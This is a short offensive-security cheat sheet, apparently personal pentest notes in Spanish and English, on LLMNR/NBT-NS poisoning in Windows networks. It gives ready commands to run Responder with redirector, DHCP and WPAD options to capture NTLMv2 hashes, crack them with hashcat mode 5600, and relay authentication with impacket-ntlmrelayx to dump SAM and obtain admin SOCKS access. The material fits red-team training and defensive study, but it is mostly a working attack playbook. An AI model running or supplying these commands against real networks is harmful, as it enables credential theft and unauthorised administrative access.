LLMNR/NBT-NS Poisoning

[!danger] The "Lazy" Admin Trap Windows usa LLMNR para resolver nombres cuando el DNS falla. Si un admin escribe \\serevr (typo) en vez de \\server, su PC gritará "¿Quién es serevr?". Nosotros responderemos: "SOY YO, dame tu hash".

1. Setup (Responder)

Ejecutar siempre al inicio si estás dentro de la red (Internal Network). Cuidado: Ruido alto. Puede romper cosas si no configuras bien el archivo .conf.

# Escuchar en la interfaz VPN/Tunel
sudo responder -I tun0 -rdw

* -r: Enable SMB Redirector (Force login) * -d: Enable DHCP offer (Dangerous) * -w: Enable WPAD Proxy Auth

2. Capture (The Hash)

Espera a que caiga alguien. Verás en pantalla: [SMB] NTLMv2 Client : 172.16.1.50 ... Hash: ...

3. Cracking (Offline)

Copia el hash NTLMv2 completo en un archivo hash.txt.

Hashcat

Modo: 5600 (NetNTLMv2)

hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt

4. Relay (The Advanced Move)

Si el SMB Signing está DESHABILITADO en otras máquinas, no necesitas crackear. Puedes retransmitir la autenticación y ganar acceso directo. 1. Edita /etc/responder/Responder.conf: SMB = Off, HTTP = Off. 2. Ejecuta ntlmrelayx.py:

# Relayer a una lista de objetivos, intentar dumpear SAM
impacket-ntlmrelayx -tf targets.txt -smb2support -socks

3. Si tienes éxito, tendrás un socket SOCKS en el puerto 1080 para acceder como admin.